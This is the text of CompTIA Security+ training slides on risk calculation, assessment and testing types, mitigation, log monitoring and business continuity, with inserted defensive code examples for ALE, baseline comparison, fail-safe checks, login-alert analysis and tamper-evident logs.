Annualized Rate of Occurrence (ARO): How many times the loss is expected to happen in a given year (a probability when it is less than once a year)
Annualized Loss Expectancy (ALE): How much is estimated to be lost each year to a given risk. SLE x ARO = ALE
Risk Calculation
Annualized Loss Expectancy Example
A web server for an e-commerce business generates $5,000 per hour. This web server’s probability of failing within one year is 10%. If the web server goes down, it takes 2 hours to get back up and running again.
Here AV is the $5,000 of revenue per hour, EF is the 2 hours of outage, and ARO is 0.1.
AV x EF = SLE:      5,000 x 2 = $10,000
SLE x ARO = ALE:    10,000 x 0.1 = $1,000
Risk Calculation
Annualized Loss Expectancy Example
The same web server, but the estimated cost to replace failed components is $200. The replacement cost is a fixed cost per incident, so it is added to the SLE before multiplying by the ARO.
(AV x EF) + replacement cost = SLE:   (5,000 x 2) + 200 = $10,200
SLE x ARO = ALE:                      10,200 x 0.1 = $1,020
Risk Calculation
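The two calculations above, as an added worked example (not material from the course), with one more step the slide's numbers invite: a cost/benefit test for a mitigation. The web-server figures are the slide's; the hot-spare scenario (outage cut to 15 minutes for an assumed $500 per year) is constructed.

```python
def single_loss_expectancy(asset_value: float, exposure_factor: float, fixed_cost: float = 0.0) -> float:
    """SLE = AV x EF, plus any fixed per-incident cost such as replacement parts."""
    return asset_value * exposure_factor + fixed_cost


def annualized_loss_expectancy(sle: float, aro: float) -> float:
    """ALE = SLE x ARO; an ARO below 1 is the yearly probability of the incident."""
    return sle * aro


def net_benefit_of_control(ale_before: float, ale_after: float, annual_control_cost: float) -> float:
    """Cost/benefit test used to justify a mitigation: positive means the control
    removes more expected loss per year than it costs to run."""
    return (ale_before - ale_after) - annual_control_cost


def web_server_example():
    # Slide figures: $5,000/hour revenue (AV), 2 hours of outage (EF),
    # 10% yearly failure probability (ARO), $200 of replacement parts per incident
    sle = single_loss_expectancy(5000, 2, fixed_cost=200)
    return sle, annualized_loss_expectancy(sle, 0.10)


def hot_spare_example() -> float:
    """Constructed extension: a hot spare (assumed $500/year) cuts the outage to 0.25 hours.
    Returns the net yearly benefit of buying it."""
    _, ale_before = web_server_example()
    sle_after = single_loss_expectancy(5000, 0.25, fixed_cost=200)
    ale_after = annualized_loss_expectancy(sle_after, 0.10)
    return round(net_benefit_of_control(ale_before, ale_after, 500), 2)
```

Keeping the fixed replacement cost separate from AV x EF is what makes the second slide's $10,200 come out right; folding it into either factor distorts every later comparison.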
Options for Handling Risk
Mitigation and Deterrence
• Risk-avoidance: Avoid the risk by no longer having or doing what is associated with the risk
• Transference: Share some of the burden of the risk with another entity like an insurance company
• Mitigation: Take action to try to reduce the likelihood or impact of the risk
• Deterrence: Make the risk less enticing to attackers with threat of prosecution or other public safeguards
• Acceptance: Retain a risk if the cost to mitigate is more than the impact of an attack
Control Types
Recommended Security Controls for Federal Information Systems and Organizations, NIST Special Publication 800-53, available at http://csrc.nist.gov/
• Management: assessment and planning
• Technical: systems
• Operational: actions
Mitigation and Deterrence
Control Type Families (NIST SP 800-53 control classes)
Management: Security Assessment and Authorization; Planning; Risk Assessment; System and Services Acquisition; Program Management
Technical: Access Control; Audit and Accountability; Identification and Authentication; System and Communications Protection
Operational: Awareness and Training; Configuration Management; Contingency Planning; Incident Response; Maintenance; Media Protection; Physical and Environmental Protection; Personnel Security; System and Information Integrity
Mitigation and Deterrence
Evaluation
• Review the adequacy of security controls
– Did they eliminate the risk?
– Did they reduce the risk?
• Is there any residual risk?
• Continue to look for new threats and vulnerabilities
Key Terms You Should Know
Term Definition
Asset What we are trying to protect: people, property, information, and reputation
Vulnerability
A flaw, weakness, or gap that can be exploited by threats to gain unauthorized access to an asset
Threat Something that exploits a vulnerability and can potentially cause loss/harm to assets
Risk The possibility of damage, destruction, or theft of an asset
Key Terms You Should Know
Term Definition
Quantitative
In terms of risk assessment, a quantitative assessment is one based on the monetary value of an asset or the cost of a risk’s impact
Qualitative
In terms of risk assessment, a qualitative assessment is one based on the importance or sensitivity of an asset
Impact
The outcome of a risk happening. The cost of a risk or the damage or loss of assets caused by a risk
Likelihood The probability that a risk will happen
Key Terms You Should Know
Term Definition
Annualized Loss Expectancy (ALE)
How much money is expected to be lost from a particular risk in one year
Annualized Rate of Occurrence (ARO)
The probability of a SLE happening or how many times a SLE is expected to happen in a year
Single Loss Expectancy (SLE)
How much money is expected to be lost from a single incident of a risk
Asset Value (AV) How much an asset is worth. Based on how much money it is making for the company as well as the cost to replace
Exposure Factor (EF)
The proportion of the asset's value lost in a single incident (a percentage, or in this lesson's example the hours of outage); the multiplier that turns AV into SLE
Key Terms You Should Know
Term Definition
Risk-avoidance No longer using or doing something that is vulnerable
Transference Sharing a risk with a third party
Acceptance
Deciding to tolerate the impact of a risk. Often used with low level risks or residual risk after mitigation
Mitigation Actively employing controls to lower the likelihood or impact of a risk
Deterrence Making a threat less attractive to attackers
What We Covered
Risk Management Vocabulary
• Asset
• Vulnerability
• Threat
• Risk
• Impact
• Qualitative Assessment
• Quantitative Assessment
Risk Calculation
• Impact Analysis
• Threat vs. Likelihood
• Annualized Loss Expectancy (ALE)
Options for Handling Risk
• Risk-avoidance
• Transference
• Acceptance
• Mitigation
• Deterrence
Control Types
• Technical
• Management
• Operational
Threat and Vulnerability Assessment and Detection
In This Lesson:
Assessment Types
• Vulnerability
• Threat
• Risk
Assessment Techniques
• Baseline Reporting
• Code Review
• Determine Attack Surface
• Architecture
• Design Review
In This Lesson:
Exam Objective: 3.7 (Partial) Implement assessment tools
and techniques to discover security threats and vulnerabilities
3.8 Within the realm of vulnerability assessments, explain the proper use of penetration testing versus vulnerability scanning
Testing and Scanning
Tools
• Protocol Analyzer / Sniffer
• Port Scanner
• Honeypot and Honeynet
Vulnerability Scanning
Penetration Testing
• Black, White, and Gray Box Testing
Assessment Types
Assessment Type | Definition | Benefits
Vulnerability | Finding security flaws | Baselines and ongoing security
Threat | Determining which threats line up with the vulnerabilities of your particular systems; analyzing the tools and resources that attackers have | Zero in on specific security implementations
Risk | Determining what the risks are and the likelihood and impact of those risks | Prioritize security; help determine security budgeting
• Baseline Reporting
– First you need a baseline
–Compare the current to the baseline after changes or events
–Software can automatically generate reports about differences that don’t match the baseline (change detection)
–Good for regulatory compliance
Assessment Techniques
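Baseline reporting in code, as an added example that is not part of the course material: a baseline of file fingerprints is recorded once, and later states of the host are compared to it to produce the change-detection report the slide describes. The file paths and contents are constructed sample data, not taken from any real system.

```python
import hashlib
import json

# Constructed sample data (not from any real host): the recorded baseline of a
# few configuration files and the state of the same files after some changes.
BASELINE_FILES = {
    "/etc/ssh/sshd_config": "PermitRootLogin no\nPasswordAuthentication no\n",
    "/etc/hosts": "127.0.0.1 localhost\n",
    "/etc/sudoers": "root ALL=(ALL) ALL\n",
}
CURRENT_FILES = {
    "/etc/ssh/sshd_config": "PermitRootLogin yes\nPasswordAuthentication no\n",
    "/etc/hosts": "127.0.0.1 localhost\n",
    "/etc/cron.d/nightly-job": "0 2 * * * root /usr/local/bin/cleanup\n",
}


def fingerprint(files):
    """Map each path to the SHA-256 of its content; this is what a baseline stores."""
    return {path: hashlib.sha256(content.encode()).hexdigest()
            for path, content in files.items()}


def save_baseline(files):
    """Serialize the fingerprint so it can be kept (read-only) away from the host."""
    return json.dumps(fingerprint(files), sort_keys=True)


def compare_to_baseline(baseline_json, current_files):
    """Report which paths were added, removed or modified relative to the baseline."""
    baseline = json.loads(baseline_json)
    current = fingerprint(current_files)
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(path for path in set(baseline) & set(current)
                      if baseline[path] != current[path])
    return {
        "added": added,
        "removed": removed,
        "modified": modified,
        # A host matches its baseline only when all three lists are empty.
        "matches_baseline": not (added or removed or modified),
    }


if __name__ == "__main__":
    report = compare_to_baseline(save_baseline(BASELINE_FILES), CURRENT_FILES)
    for kind in ("added", "removed", "modified"):
        for path in report[kind]:
            print(f"{kind:8s} {path}")
    print("matches baseline:", report["matches_baseline"])
```

The report lists the changed sshd setting, the missing sudoers file and the new cron entry; a compliance audit keeps such reports alongside the change tickets that authorized each difference.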
• Code Review
– Looking at custom made code to find holes
• Injection or cross-site vulnerabilities
–Manual assessment
• A detailed reading through the source code (should be done by skilled developers)
–Automated assessment
• Using tools to scan the code
Assessment Techniques
Figure: Black Box, White Box, Gray Box
• Determine Attack Surface
–The part of an application or system that is accessible or visible
–Can include interfaces, protocols, code, data, and more
–Practice attack surface reduction (ASR) to limit potential damage
• Turn off unnecessary services and functions
• Allow only least privileges
• Strengthen authentication services
Assessment Techniques
• Architecture
–Reviews how a system or application is interconnected with the network architecture
• How it interacts with the users, databases, devices, browsers, and services
• How do those interconnections affect security?
Assessment Techniques
• Design Reviews
–Application design review
• Done during the development process
• Looks at the attack surface of an application
– User inputs and interactions
–Network design review
• Reviews the network and system design
– What ports and protocols are open?
– What rules and access controls are in place?
– What information models are used?
Assessment Techniques
Testing and Scanning
• Protocol Analyzer / Sniffer
–Captures packets en route and then analyzes them
• Resources, ports, and source/destination addresses
–Used for troubleshooting as well as security
• Malicious traffic
• Misconfigurations
• Network baselines
–Wired and wireless options
–Applications/appliances have GUIs and reports
• Wireshark
• Tcpdump (Linux command line)
• NAI Sniffer
Tools
• Port Scanner
– Find out what ports are open, closed, or filtered
– Find ports you didn’t know were open
–SYN packets are one way to test how ports respond
–Attackers use port scanning to find ports that provide services that can be exploited
–Applications
• Nmap
• Included with vulnerability scanners
Tools
SYN Packet Response | Port State
--- | ---
SYN/ACK | Open
RST | Closed
No response | Filtered
• Honeypot
–A system created for the purpose of letting attackers attack it and studying the results
–Honeynet
• More than one honeypot working together
• An entire network set up to invite attack
– Applications, services, and user accounts
• Uses virtualization
• Sometimes integrated with a larger IDS/IPS
–Uses
• Development and research
• Information gathering and decoy
Tools
• Tests for known vulnerabilities
• Passively tests security controls
• Performs scans that look for the latest vulnerabilities
• Many types of vulnerability scanners available
• Plan vulnerability scanning
–Backup first
–Do during off hours
–Once a month or once a quarter
Vulnerability Scanning
• Applications/appliances have GUI interfaces and reports
–Nessus
–Retina
–SAINT
• Interpreting the results
–Reports from commercial scanners list open ports and vulnerabilities
• Identify false positives
• Identify vulnerabilities
• Identify lack of security controls
• Identify common misconfigurations
Vulnerability Scanning
• Using any and all methods to try to break in to your fully protected network
• An experienced tester uses a variety of tools and methods
• OSSTMM and NIST have standard penetration testing methodologies
• Actively test and try to bypass your security controls
• Verify a threat exists without exploiting vulnerabilities
Penetration Testing
• Black, white, and gray box testing
Penetration Testing
Black Box Penetration Testing
Tester acts as an outside hacker
Has no inside knowledge of the network prior to the test
Typically, most of the IT staff does not know the test is taking place
White Box Penetration Testing
Tester acts as a malicious insider with full network understanding
Has knowledge of code, systems, topology, a user account, etc.
IT staff knows about the test
Gray Box Penetration Testing
Tester acts as if he is an outsider working with a malicious insider
Key Terms You Should Know
Term | Definition
--- | ---
Vulnerability Assessment | Finding and assessing the holes and weaknesses in applications and systems
Threat Assessment | Finding and assessing the source and means of the attacks that our systems are vulnerable to
Risk Assessment | Determining the impact and likelihood of risks
Attack Surface | The area of an application or system that is visible, accessible, and therefore potentially vulnerable
Key Terms You Should Know
Term | Definition
--- | ---
Honeypot | A computer that is intentionally left open to attack in order to study how attacks are carried out and lure attackers away from legitimate systems
Honeynet | More than one honeypot connected together or an entire virtual network meant to be attacked
Vulnerability Scanning | Using a database of known vulnerabilities to scan a system or network looking for weaknesses
Penetration Testing | Actively testing your network security using any and all methods to simulate what attacks from hackers or malicious insiders would use
Key Terms You Should Know
Term | Definition
--- | ---
Black Box Testing | Testing code or systems without any prior information about the inner workings of that application or system
White Box Testing | Testing code or systems with full disclosure of the inner workings of that application or system
Gray Box Testing | Testing code or systems from the outside with some understanding of the inner workings to help guide the test
In This Lesson:
Assessment Types
• Vulnerability
• Threat
• Risk
Assessment Techniques
• Baseline Reporting
• Code Review
• Determine Attack Surface
• Architecture
• Design Review
In This Lesson:
Testing and Scanning
Tools
• Protocol Analyzer / Sniffer
• Port Scanner
• Honeypot and Honeynet
Vulnerability Scanning
Penetration Testing
• Black, White, and Gray Box Testing
CompTIA Security+ Training Instructor: Lisa Szpunar
Risk Mitigation and Deterrence
CompTIA Security+ Training
Risk Mitigation and Deterrence
In This Lesson:
Mitigation Strategies
Security Posture
• Initial Baseline Configuration
• Continuous Security Monitoring
• Remediation
Manual Bypassing of Electronic Controls
• Failsafe vs. Failopen
Change Management
Implement Security Controls Based on Risk
Detection vs. Prevention Controls
Hardening
Perform Routine Audits
• User Rights and Permissions Reviews
Data Loss or Theft Prevention
In This Lesson:
Exam Objective: 2.1 (Partial) Explain risk related concepts
2.2 Carry out appropriate risk mitigation strategies
3.6 (Partial) Analyze and differentiate among types of mitigation and deterrent techniques
Policies
Security Policies
Privacy Policies
Acceptable Use Policies
Other Policies
Mitigation Strategies
• The overall approach an organization takes to security
• Creating and maintaining your security posture
– Initial baseline configuration
• Take into account regulatory compliance
• Remember patch management
–Continuous security monitoring
• Utilize your monitoring systems
• Perform audits
• Keep up on the latest information with security organizations, websites, and blogs
–Remediation
• Quarantine that system until it meets the baseline
• Document and verify results
Security Posture
• Electronic controls can be bypassed
– Turning off or short circuiting the power
– Overloading or confusing sensors
• Failsafe vs. Failopen
– Failsafe: Failure happens in a secure way
– Failopen: Failure happens in an unsecure way
Manual Bypassing of Electronic Controls
Failsafe Examples | Failopen Examples
--- | ---
A failed electronic lock blocks any entry | A failed electronic lock remains unlocked
A failed application closes | A failed application remains open
A failed firewall blocks all traffic | A failed firewall allows all traffic
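The failsafe and failopen rows for an application and a firewall, written as code. This is an added example, not part of the course material: the policy store, its failure, the rule set and the packets are all constructed stand-ins, and the two functions differ only in what they do when the check itself cannot be completed.

```python
import logging


class PolicyStoreError(Exception):
    """Raised when the authorization backend cannot be reached (constructed failure)."""


def lookup_permission(user, action, policy, backend_up=True):
    """Stand-in for a policy-store query; fails like a down service when backend_up is False."""
    if not backend_up:
        raise PolicyStoreError("policy store unreachable")
    return action in policy.get(user, set())


def is_allowed_fail_open(user, action, policy, backend_up=True):
    # Fail-open: when the check itself breaks, the request goes through.
    # This is the "failed application remains open" row of the table.
    try:
        return lookup_permission(user, action, policy, backend_up)
    except PolicyStoreError:
        return True


def is_allowed_fail_safe(user, action, policy, backend_up=True):
    # Fail-safe: when the check cannot be completed, deny and record the failure
    # so operators learn about the outage instead of attackers.
    try:
        return lookup_permission(user, action, policy, backend_up)
    except PolicyStoreError as exc:
        logging.error("authorization unavailable, denying %s:%s (%s)", user, action, exc)
        return False


def firewall_decision(rules, packet, rules_loaded, fail_safe):
    """Packet filter whose rule set may fail to load; fail_safe selects the failure mode.

    rules: list of (dst_port, "allow" | "deny"); packet: dict with a "dst_port" key.
    """
    if not rules_loaded:
        # "blocks all traffic" versus "allows all traffic" from the table
        return "deny" if fail_safe else "allow"
    for port, verdict in rules:
        if port == packet["dst_port"]:
            return verdict
    return "deny"   # default deny for traffic no rule mentions
```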
• Working within predefined procedures and timelines for change
• Evaluating, authorizing, testing, carrying out, and documenting changes
• Changes to systems, configurations, what software is installed, etc.
– Configuration control of systems that have been baselined
• New deployments, expansion, and reorganization also falls under change management
Change Management
Change Management
Change Management Goals
•Prevent new security vulnerabilities due to change
•Prevent loss of functionality due to change
•Schedule and stage change to minimize impact to users
•Communicate downtime in advance of implementing change
•Document change for communication and auditing purposes
•Allow changes to be reversed with a rollback strategy
•Require separation-of-duties through management oversight
•Follow up with changes after they are implemented
•Follow security minimum baselines and uncover changes to configuration baselines
Figure: options for handling risk: Risk-avoidance, Transference, Mitigation, Deterrence, Acceptance
• Risks are prioritized as a part of risk assessments and calculations
• The risks that will cost the most harm warrant the most resources to mitigate
• Security controls must be chosen and implemented in a systematic way
– The cost of the control must be less than the impact of the risk
• Including maintenance and monitoring
– The benefit of the control must be measurable or verifiable
Implement Security Controls Based on Risk
• Detection controls watch for and issue alerts about possible attacks
• Prevention controls work to keep attacks from happening or take action to stop them once they start
• Examples:
– Intrusion detection systems vs. intrusion prevention systems
–Security camera vs. security guard
Detection vs. Prevention Controls
• Intrusion Detection Systems vs. Intrusion Prevention Systems
– IDS
• Monitors network traffic and compares it to known attacks and network history
• Creates alerts when a possible attack or anomaly is detected
• Able to perform limited active controls
– IPS
• Does intrusion detection plus prevention
• Takes action in real time to stop attacks in progress
Detection vs. Prevention Controls
• Security camera vs. security guard (have both for the most benefit)
Detection vs. Prevention Controls
Camera (Detection) | Guard (Prevention)
--- | ---
Technical solution | Non-technical solution
May deter some wrongdoing if cameras are visible | Can proactively deter, prevent, and respond to issues
Always running | Can have gaps in coverage
Records everything within range | Relies on memory
Footage can be replayed later | Relies on memory
Creates evidence for criminal cases | Can collect evidence
Stationary with a limited field of view | Able to move around
Has no intelligence | Flexible and can adapt to situations
Less expensive | More expensive
• Reducing the attack surface of a system or application
–Disabling unnecessary services
–Protecting management interfaces and applications
• Restrict access
• Change default passwords
• Encrypt remote connections
–Protecting passwords
–Disabling unnecessary accounts
–Keeping patches, updates, and hot-fixes up to date
Hardening
• Checking to make sure policies, procedures, and regulations are being followed
• Do on a routine schedule
• Often carried out by a third party
Perform Routine Audits
Figure: audit cycle: Plan, Conduct, Evaluate, Communicate Results, Make Changes, Document and Follow Up
• User rights and permissions reviews
– Private audit
– Do users have the access and privileges that they should and no more?
– Who has administrative privileges?
– Work with management to determine what the expected rights and permissions should be
Perform Routine Audits
• Usage audit
– How are applications, systems, and resources being used?
– Often done after an incident
• Log file audit
– Studying logs for trends and correlations
– Making sure log files are not growing too large in size
Perform Routine Audits
• Administrative audit
– Are all change management and documentation procedures being carried out?
• Escalation audit
– Are communication and procedures in place to deal with incidents and disasters?
• Regulatory compliance audit
– PCI
– HIPAA
– SOX
Perform Routine Audits
• Data loss policy
–A legal statement that gives an overview of how a company protects its data under normal circumstances
–Also includes a statement that the company is not responsible for data loss due to some situations
• Data loss procedures
–Secure data disposal
–DLP system
–Monitoring
– Information models
–Backup and high availability
–Encryption
Data Loss or Theft Prevention
Policies
• How a company intends to secure its assets
– Includes expectations for employee behavior, physical access, technical security controls, digital certificate handling, data handling, and more
• Policy sub-types
–Standards
• Mandatory rules that must be followed
–Guidelines
• General rules and recommendations that may require judgment on how and when to follow
–Procedures
• Step-by-step methods for how standards are carried out
Security Policies
• For consumers
–A legal statement of what personal information a company collects from customers and what, if any, of this info is shared with third parties
• For employees
–What information should not be shared outside the company
–A statement to employees about what a company can do with the stored data and transmissions that happen within its network
• Must comply with applicable laws and regulations
• Dictates how data is collected, stored, and transmitted
Privacy Policy
• Outlines how employees can use company systems and resources
– Internet
–Software
–Telephones
• How and if personal software and devices are allowed
–Phones
–Tablets
–USB drives
Acceptable Use Policy (AUP)
–Mandatory vacations
– Job rotation
–Separation of duties
– Least privilege
–Password policy
–Clean desk policy
–Due care
–Document disposal and destruction policy
– Incident response
Other Policies
Key Terms You Should Know
Term | Definition
--- | ---
Security Posture | The overall approach a company takes to security
Failsafe | When a system or application fails, it does so in a secure way
Failopen | When a system or application fails, it does so in an unsecure way leading to privilege escalation and bypassing of security controls
Change Management | A systematic approach to plan, approve, test, implement, and document change
Key Terms You Should Know
Term | Definition
--- | ---
Detection Controls | Security controls that are designed to detect and alert you to possible security issues. Examples are IDS and security cameras
Prevention Controls | Security controls that are designed to prevent security issues. Examples are IPS and security guards
Security Policy | Standards, guidelines, and procedures that outline how a company secures its assets
Privacy Policy | States how customer information is collected and used and if employee data and communications are subject to monitoring
Acceptable Use Policy | States how employees are allowed to use company resources. It also lists rules for how or if personal devices are allowed
What We Covered
Mitigation Strategies
Security Posture
• Initial Baseline Configuration
• Continuous Security Monitoring
• Remediation
Manual Bypassing of Electronic Controls
• Failsafe vs. Failopen
Change Management
Implement Security Controls Based on Risk
Detection vs. Prevention Controls
Hardening
Perform Routine Audits
• User Rights and Permissions Reviews
Data Loss or Theft Prevention
What We Covered
Policies
Security Policies
Privacy Policies
Acceptable Use Policies
Other Policies
CompTIA Security+ Training Instructor: Lisa Szpunar
Log Monitoring and Reporting
CompTIA Security+ Training
Log Monitoring and Reporting
In This Lesson:
Reporting
• Alerts
• Alarms
• Trends
Monitoring and Analyzing Logs
Log Types
• Event Logs
• Audit Logs
• Security Logs
• Access Logs
Log Management
Exam Objective: 3.6 (Partial) Analyze and differentiate among types of mitigation and deterrent techniques
• Alerts
–Automated messages triggered by predetermined events
–Administrators set the alert triggers
• Low disk space
• Large number of failed login attempts
• Higher than normal CPU or memory usage
• Higher than normal network bandwidth use
• Patch/update failure
–Alert levels: green, yellow, or red
• Alarms
–A critical alert that needs immediate attention
Reporting
• Trends
– Looking at events, alerts, and alarms over time can reveal many things
• Tendencies, underlying problems, equipment starting to fail, and more
–Graphs and reports make it easier to visualize trends
• False Positives
–Alerts that are not actual issues
–Reduce
• Tweaking metrics
• Looking for correlations
Reporting
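The alert triggers, levels and false-positive reduction from the last two slides, run over sample log lines. This is an added example, not part of the course material: the sshd-style lines, the addresses and the thresholds are constructed, and the two correlations (many distinct account names from one source, and a handful of failures followed by a successful login) are the author's own choice of what to correlate.

```python
import re
from collections import defaultdict

# Matches OpenSSH-style authentication lines; the sample lines below are constructed.
AUTH_RE = re.compile(
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"
)

SAMPLE_LOG_LINES = [
    "Mar  3 10:01:02 srv1 sshd[2101]: Failed password for alice from 10.0.0.15 port 50123 ssh2",
    "Mar  3 10:01:05 srv1 sshd[2101]: Failed password for alice from 10.0.0.15 port 50124 ssh2",
    "Mar  3 10:01:09 srv1 sshd[2101]: Accepted password for alice from 10.0.0.15 port 50125 ssh2",
] + [
    f"Mar  3 10:02:{i:02d} srv1 sshd[2140]: Failed password for invalid user {user} "
    f"from 203.0.113.5 port {4000 + i} ssh2"
    for i, user in enumerate(["admin", "root", "test", "oracle", "guest", "backup", "postgres"])
]


def summarize_auth(lines):
    """Per source address: failure count, distinct account names tried, and whether any login succeeded."""
    summary = defaultdict(lambda: {"failures": 0, "users": set(), "succeeded": False})
    for line in lines:
        match = AUTH_RE.search(line)
        if not match:
            continue
        entry = summary[match["src"]]
        if match["result"] == "Failed":
            entry["failures"] += 1
            entry["users"].add(match["user"])
        else:
            entry["succeeded"] = True
    return summary


def alert_level(failures, yellow_at=3, red_at=10):
    """Colour from the failure count alone; the thresholds are the metrics an admin tweaks."""
    if failures >= red_at:
        return "red"
    if failures >= yellow_at:
        return "yellow"
    return "green"


def evaluate_alerts(lines, yellow_at=3, red_at=10, spray_users=5):
    """Turn the per-source summary into alerts, correlating other fields to cut false positives."""
    alerts = {}
    for src, entry in summarize_auth(lines).items():
        level = alert_level(entry["failures"], yellow_at, red_at)
        escalated = False
        # Correlation 1: many different account names from one source is not a
        # mistyped password, so raise it to red even below the count threshold.
        if len(entry["users"]) >= spray_users and level != "red":
            level, escalated = "red", True
        # Correlation 2: a source with only a few failures that also logged in
        # successfully looks like a user fixing a typo, so flag it as a likely false positive.
        likely_false_positive = entry["succeeded"] and level == "green"
        alerts[src] = {
            "failures": entry["failures"],
            "distinct_users": len(entry["users"]),
            "level": level,
            "alarm": level == "red",          # red alerts are the alarms
            "escalated_by_correlation": escalated,
            "likely_false_positive": likely_false_positive,
        }
    return alerts


if __name__ == "__main__":
    for src, alert in evaluate_alerts(SAMPLE_LOG_LINES).items():
        print(src, alert)
```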
• Why Log?
–Keeps track of who, what, and when
–Accountability
– Intrusion detection
–Reconstruction after an incident
–Problematic trend detection
–Demonstrating compliance with policy or regulations
• Logs Are Created by Many Sources
–Routers, switches, firewalls, antimalware, IDS, authentication systems, and more
Monitoring and Analyzing Logs
• Many Uses
–Machine health, network performance, user data, and more
–Security
• Incorrect login attempts
• Frequency of database access
• Number of active sessions
• Network traffic
• Automation and Consolidation Software Should Be Used
–Reporting
–Post-event analysis
–Real-time analysis
Monitoring and Analyzing Logs
• Event logs
–Records system events
• Shutdowns, service starts, state changes, and more
• Performance logs
–Records system performance
• CPU usage, memory usage, disk activity, and network usage
Log Types
• Audit logs
–Records the activities of users and services
• Logins, object access, account changes, and configuration changes
–Holds users accountable
• Catches mistakes, reduces fraudulent activities, and tracks and logs network activity
– In accordance with the organization's security policies
Log Types
• Security logs
– Logs from security devices, software, and services
• IDS/IPS, firewalls, antivirus software, authentication services
• Access logs
–Records access to resources
–Records physical access to buildings or secure areas
Log Types
• Generating, transferring, storing, analyzing, and disposing of logs
• Security of logs
–Contains info about your network and users
–Restrict access, encrypt, and hash (integrity)
–Protect your log files while at rest and in transit
Log Management
Issues to Be Aware Of
•Limited resources for log analysis and storage
•Lack of clear log analysis goals
•Incompatible or proprietary log formats
•Inconsistent time stamps on logs
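Hashing for log integrity, as an added example that is not part of the course material. Each entry's digest covers the previous digest as well as the entry, and a keyed hash (HMAC) is used rather than a plain hash so that whoever alters a log cannot simply recompute the digests; the key, log lines and alterations are all constructed for the demonstration.

```python
import hashlib
import hmac

GENESIS = "0" * 64   # digest that precedes the first entry


def entry_digest(key, previous_digest, line):
    """Keyed hash over the previous digest and this line, which chains the entries together."""
    return hmac.new(key, (previous_digest + "\n" + line).encode(), hashlib.sha256).hexdigest()


def seal_log(key, lines):
    """Attach a chained digest to each line as it is written."""
    sealed, previous = [], GENESIS
    for line in lines:
        previous = entry_digest(key, previous, line)
        sealed.append((line, previous))
    return sealed


def verify_log(key, sealed):
    """Return the index of the first entry that fails verification, or -1 if the log is intact."""
    previous = GENESIS
    for index, (line, digest) in enumerate(sealed):
        if not hmac.compare_digest(entry_digest(key, previous, line), digest):
            return index
        previous = digest
    return -1


# Constructed key and log lines; in practice the key lives with the log
# collector, not on the monitored device whose logs it protects.
SAMPLE_KEY = b"constructed-demo-key"
SAMPLE_LINES = [
    "2024-03-03T10:01:02Z srv1 sshd: Accepted publickey for alice from 10.0.0.15",
    "2024-03-03T10:05:40Z srv1 sudo: alice : COMMAND=/usr/bin/systemctl restart nginx",
    "2024-03-03T10:07:11Z srv1 sshd: Disconnected from user alice 10.0.0.15",
]


def altered_sample(which):
    """Altered copies of the sealed sample log, to show what verification catches."""
    sealed = seal_log(SAMPLE_KEY, SAMPLE_LINES)
    if which == "edit":      # entry text changed after the fact
        sealed[1] = (sealed[1][0].replace("alice", "bob"), sealed[1][1])
    elif which == "delete":  # an entry removed from the middle
        del sealed[1]
    elif which == "append":  # an entry added without knowing the key
        sealed.append(("2024-03-03T10:09:00Z srv1 sshd: Disconnected from user bob 10.0.0.16", "00" * 32))
    return sealed
```

Cutting entries off the end of the chain is the one change this alone does not reveal, which is why the latest digest should also be recorded somewhere the log writer cannot reach.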
• Storage and Backup
–Store logs separate from the devices you are monitoring
–Keep logs in an easy to access database for 60-90 days
• Ready for analysis, forensic investigations, and audits
– Log retention
• May be needed for regulatory compliance or legal reasons
• Logs can be compressed for long term storage
• Log Disposal
–Securely destroy logs once the data retention period has ended
Log Management
Key Terms You Should Know
Term | Definition
--- | ---
Alerts | Error, warning, or information notifications
Alarms | The most severe alerts that need immediate attention
Trends | Patterns of events that happen over time reveal trends that can point to underlying problems
False Positive | A reported security issue that once examined turns out to be a false alarm
What We Covered
Reporting
• Alerts
• Alarms
• Trends
Monitoring and Analyzing Logs
Log Types
• Event Logs
• Audit Logs
• Security Logs
• Access Logs
Log Management
CompTIA Security+ Training Instructor: Lisa Szpunar
Business Continuity
CompTIA Security+ Training
Business Continuity
In This Lesson:
Exam Objective: 2.5 Compare and contrast aspects of business continuity
Business Continuity vs. Disaster Recovery
Business Continuity Planning (BCP) and Testing
Business Impact Analysis
IT Contingency Planning
• Removing Single Points of Failure
Continuity of Operations
Succession Planning
Business Continuity vs. Disaster Recovery
Business Continuity: The continued operation of the organization
Disaster Recovery: Recover from and rebuild the organization after a disaster has occurred
• Writing the policies and deciding on procedures for business continuity
– Identify the critical business functions (CBF)
• CBF are complex and interconnected
– Almost everything goes through IT
–Determine what threats are most likely to cause a disruption
–Create countermeasures that will minimize disruptions
• BCP involves
–Risk mitigation planning
–Change management
–Business impact analysis
–Recovery planning
• Testing
–Test your BCP before you need it!
Business Continuity Planning (BCP) and Testing
Figure: BCP lifecycle with the stages Business Impact Analysis, Develop Solutions, Implement and Train, Test, Maintenance, and Document
Business Continuity Planning (BCP) and Testing
• Focuses on the impact of an event and recovering from that event
– Loss of asset or significant change to the business or market
• Not concerned with how the event was caused (threat and vulnerabilities)
• Steps
1. Define and prioritize what the critical business functions (CBF) are
2. Determine the impact of a disruption to a CBF
3. Calculate the amount of time that is acceptable for the disruption to last (recovery time objective)
4. Document the procedures for how to recover and what resources are needed for recovery
Business Impact Analysis
• A part of the overall BCP that covers:
–Security threats
–System failure
–Disaster
• Implement preventative controls
• Remove single points of failure
– IT infrastructure, utilities, or facilities
– Implement redundancy and fault tolerance
–Use analysis calculations to decide which single points of failure to remove
• Document contingency strategies and procedures
• Perform and test backups
IT Contingency Planning
• Some refer to a continuity of operations plan (COOP) as the same as a BCP
• NIST refers to a COOP as a plan for how to restore essential functions at an alternative site
–Order of succession
–Order of functions to be brought back up
–Human resources management
–Budget
Continuity of Operations
• Having individuals prepared to fulfill/replace key positions within the company
–Planned or unplanned
–A comprehensive succession plan funnels down the line
• Minimize disruption that a gap in leadership could cause
• What does that mean for IT?
–Digital certificate key management
–Account management
Succession Planning
Key Terms You Should Know
Term | Definition
--- | ---
Business Continuity Planning | Analyzing, developing, implementing, training, testing, and maintaining the policies and processes that keep critical business functions going day-to-day and minimize the impact of disruptions
Business Impact Analysis | Determines the most important critical business functions, the impact of a disruption to those functions, and how to recover from the disruption
Single Point of Failure | A component of a system that, if it fails, will cause the entire system to fail
Critical Business Functions (CBF) | A process that is vital to the health of the business. If this process were to sustain a long disruption the company would suffer great loss
What We Covered
Business Continuity vs. Disaster Recovery
